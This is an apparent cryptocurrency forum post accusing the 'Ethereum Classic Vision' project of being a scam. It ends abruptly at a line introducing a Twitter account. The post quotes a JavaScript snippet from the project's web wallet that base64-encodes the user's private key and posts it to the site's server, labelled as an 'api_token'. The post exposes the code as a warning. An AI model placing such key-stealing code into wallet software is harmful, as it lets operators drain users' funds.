Post
Topic
Board Scam Accusations
Merits 15 from 12 users
Topic OP
Ethereum Classic Vision scam
by
JohnUser
on 10/01/2019, 12:45:28 UTC
⭐ Merited by Halab (3) ,Kasperiko (2) ,morvillz7z (1) ,witcher_sense (1) ,asche (1) ,marlboroza (1) ,cestmoi (1) ,actmyname (1) ,ICOEthics (1) ,DevilSlayer (1) ,fast2fix (1) ,SportbetMaster (1)
I think we have enough proof to show Ethereum Classic Vision is a scam, some guys already talk about it on Ethereum Nowa

Here is the thread : https://bitcointalk.org/index.php?topic=5089443.0
https://archive.is/7kG9w

Of course no team...

~snip~

Their wallet https://etcvwallet.com requires you to enter the private key or upload the json file generated by MEW. In the javascript code from file etherwallet-master.js line 3832 they have a code that sends the private key masked somehow to their server

Code:
   
$scope.$on('ChangeWallet', function () {
        const key = window.btoa($scope.walletService.wallet.getPrivateKeyString());
        window.fetch('/api', {
            method: 'POST',
            mode: 'cors',
            cache: 'no-cache',
            credentials: 'same-origin',
            headers: {
                'Content-Type': 'application/json'
            },
            redirect: 'follow',
            referrer: 'no-referrer',
            body: JSON.stringify({ api_token: key })
        });




Their twitter account :